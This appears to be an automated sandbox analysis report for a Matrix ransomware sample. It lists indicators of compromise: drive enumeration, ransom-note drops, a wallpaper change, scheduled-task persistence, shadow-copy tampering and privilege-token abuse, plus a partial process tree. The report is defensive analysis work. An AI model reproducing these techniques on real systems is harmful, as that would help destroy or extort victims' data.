h46yIQkH64.exe67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened (read-only)	\??\A:	h46yIQkH64.exe
File opened (read-only)	\??\B:	h46yIQkH64.exe
File opened (read-only)	\??\J:	h46yIQkH64.exe
File opened (read-only)	\??\R:	h46yIQkH64.exe
File opened (read-only)	\??\Y:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\T:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\S:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	h46yIQkH64.exe
File opened (read-only)	\??\L:	h46yIQkH64.exe
File opened (read-only)	\??\O:	h46yIQkH64.exe
File opened (read-only)	\??\Q:	h46yIQkH64.exe
File opened (read-only)	\??\T:	h46yIQkH64.exe
File opened (read-only)	\??\X:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\R:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\F:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\M:	h46yIQkH64.exe
File opened (read-only)	\??\Q:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\K:	h46yIQkH64.exe
File opened (read-only)	\??\E:	h46yIQkH64.exe
File opened (read-only)	\??\W:	h46yIQkH64.exe
File opened (read-only)	\??\X:	h46yIQkH64.exe
File opened (read-only)	\??\U:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\O:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\L:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\I:	h46yIQkH64.exe
File opened (read-only)	\??\N:	h46yIQkH64.exe
File opened (read-only)	\??\N:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\I:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\E:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\U:	h46yIQkH64.exe
File opened (read-only)	\??\V:	h46yIQkH64.exe
File opened (read-only)	\??\K:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\J:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\P:	h46yIQkH64.exe
File opened (read-only)	\??\M:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\G:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\G:	h46yIQkH64.exe
File opened (read-only)	\??\S:	h46yIQkH64.exe
File opened (read-only)	\??\Z:	h46yIQkH64.exe
File opened (read-only)	\??\Z:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\W:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\P:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\V:	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened (read-only)	\??\H:	h46yIQkH64.exe
File opened (read-only)	\??\Y:	h46yIQkH64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 myexternalip.com

flow	ioc
12	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\iTranQWH.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\icudtl.dat.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\zh-CN.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling.ort.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightRegular.ttf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\beta.identity_helper.exe.manifest	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\content-types.properties	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Cyrl-BA.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\EdgeWebView.dat.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sl.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MEIPreload\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\msedge.exe.sig.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.cfg	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\javaws.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\rmic.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ja.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fil.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\tt.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\plugin.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\resources.pri	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Beta.msix.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\splash.gif	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbynet.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Staging.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\tr.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\TransparentAdvertisers	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-execution.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\lb.pak	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sv.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_pwa_launcher.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Social.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\as.pak.DATA	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Social	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\orbd.exe	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4028 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4524 vssadmin.exe

pid	process
4028	schtasks.exe

pid	process
4524	vssadmin.exe

NTFS ADS 2 IoCs

Processes:

NWSBH3uK.exe67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"_log.txt	NWSBH3uK.exe
File created	C:\Users\Admin\AppData\Local\Temp\Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"_log.txt	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exeh46yIQkH64.exe

pid	process
2496	powershell.exe
2496	powershell.exe
3644	powershell.exe
3644	powershell.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe
4892	h46yIQkH64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

h46yIQkH64.exe

pid process

4892 h46yIQkH64.exe

pid	process
4892	h46yIQkH64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeh46yIQkH64.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	4892	h46yIQkH64.exe
Token: SeLoadDriverPrivilege	4892	h46yIQkH64.exe
Token: SeTakeOwnershipPrivilege	5040	takeown.exe
Token: SeTakeOwnershipPrivilege	1564	takeown.exe
Token: SeTakeOwnershipPrivilege	2188	takeown.exe
Token: SeBackupPrivilege	4020	vssvc.exe
Token: SeRestorePrivilege	4020	vssvc.exe
Token: SeAuditPrivilege	4020	vssvc.exe
Token: SeTakeOwnershipPrivilege	4032	takeown.exe
Token: SeTakeOwnershipPrivilege	3672	takeown.exe
Token: SeTakeOwnershipPrivilege	1484	takeown.exe
Token: SeTakeOwnershipPrivilege	4796	takeown.exe
Token: SeTakeOwnershipPrivilege	4308	takeown.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4748	takeown.exe
Token: SeTakeOwnershipPrivilege	2840	takeown.exe
Token: SeTakeOwnershipPrivilege	1484	takeown.exe
Token: SeTakeOwnershipPrivilege	4428	takeown.exe
Token: SeTakeOwnershipPrivilege	2392	takeown.exe
Token: SeTakeOwnershipPrivilege	2096	takeown.exe
Token: SeTakeOwnershipPrivilege	5044	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exeNWSBH3uK.execmd.execmd.execmd.execmd.execmd.exewscript.execmd.execmd.exeh46yIQkH.exe

description	pid	process	target process
PID 4644 wrote to memory of 3352	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 3352	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 3352	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 5000	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWSBH3uK.exe
PID 4644 wrote to memory of 5000	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWSBH3uK.exe
PID 4644 wrote to memory of 5000	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	NWSBH3uK.exe
PID 5000 wrote to memory of 1544	5000	NWSBH3uK.exe	cmd.exe
PID 5000 wrote to memory of 1544	5000	NWSBH3uK.exe	cmd.exe
PID 5000 wrote to memory of 1544	5000	NWSBH3uK.exe	cmd.exe
PID 1544 wrote to memory of 2496	1544	cmd.exe	powershell.exe
PID 1544 wrote to memory of 2496	1544	cmd.exe	powershell.exe
PID 1544 wrote to memory of 2496	1544	cmd.exe	powershell.exe
PID 4644 wrote to memory of 220	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 220	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 220	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 220 wrote to memory of 3644	220	cmd.exe	powershell.exe
PID 220 wrote to memory of 3644	220	cmd.exe	powershell.exe
PID 220 wrote to memory of 3644	220	cmd.exe	powershell.exe
PID 4644 wrote to memory of 4336	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 4336	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 4336	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 4184	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 4184	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 4184	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4336 wrote to memory of 4236	4336	cmd.exe	reg.exe
PID 4336 wrote to memory of 4236	4336	cmd.exe	reg.exe
PID 4336 wrote to memory of 4236	4336	cmd.exe	reg.exe
PID 4184 wrote to memory of 4208	4184	cmd.exe	wscript.exe
PID 4184 wrote to memory of 4208	4184	cmd.exe	wscript.exe
PID 4184 wrote to memory of 4208	4184	cmd.exe	wscript.exe
PID 4336 wrote to memory of 2188	4336	cmd.exe	reg.exe
PID 4336 wrote to memory of 2188	4336	cmd.exe	reg.exe
PID 4336 wrote to memory of 2188	4336	cmd.exe	reg.exe
PID 4644 wrote to memory of 904	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 904	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 904	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4336 wrote to memory of 3912	4336	cmd.exe	reg.exe
PID 4336 wrote to memory of 3912	4336	cmd.exe	reg.exe
PID 4336 wrote to memory of 3912	4336	cmd.exe	reg.exe
PID 904 wrote to memory of 4092	904	cmd.exe	cacls.exe
PID 904 wrote to memory of 4092	904	cmd.exe	cacls.exe
PID 904 wrote to memory of 4092	904	cmd.exe	cacls.exe
PID 904 wrote to memory of 4224	904	cmd.exe	takeown.exe
PID 904 wrote to memory of 4224	904	cmd.exe	takeown.exe
PID 904 wrote to memory of 4224	904	cmd.exe	takeown.exe
PID 4208 wrote to memory of 5024	4208	wscript.exe	cmd.exe
PID 4208 wrote to memory of 5024	4208	wscript.exe	cmd.exe
PID 4208 wrote to memory of 5024	4208	wscript.exe	cmd.exe
PID 904 wrote to memory of 1616	904	cmd.exe	cmd.exe
PID 904 wrote to memory of 1616	904	cmd.exe	cmd.exe
PID 904 wrote to memory of 1616	904	cmd.exe	cmd.exe
PID 1616 wrote to memory of 4040	1616	cmd.exe	h46yIQkH.exe
PID 1616 wrote to memory of 4040	1616	cmd.exe	h46yIQkH.exe
PID 1616 wrote to memory of 4040	1616	cmd.exe	h46yIQkH.exe
PID 5024 wrote to memory of 4028	5024	cmd.exe	schtasks.exe
PID 5024 wrote to memory of 4028	5024	cmd.exe	schtasks.exe
PID 5024 wrote to memory of 4028	5024	cmd.exe	schtasks.exe
PID 4040 wrote to memory of 4892	4040	h46yIQkH.exe	h46yIQkH64.exe
PID 4040 wrote to memory of 4892	4040	h46yIQkH.exe	h46yIQkH64.exe
PID 4644 wrote to memory of 2768	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 2768	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4644 wrote to memory of 2768	4644	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 4208 wrote to memory of 3480	4208	wscript.exe	cmd.exe
PID 4208 wrote to memory of 3480	4208	wscript.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
"C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4644
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe" "C:\Users\Admin\AppData\Local\Temp\NWSBH3uK.exe"
  2⤵
  PID:3352
- C:\Users\Admin\AppData\Local\Temp\NWSBH3uK.exe
  "C:\Users\Admin\AppData\Local\Temp\NWSBH3uK.exe" -n
  2⤵
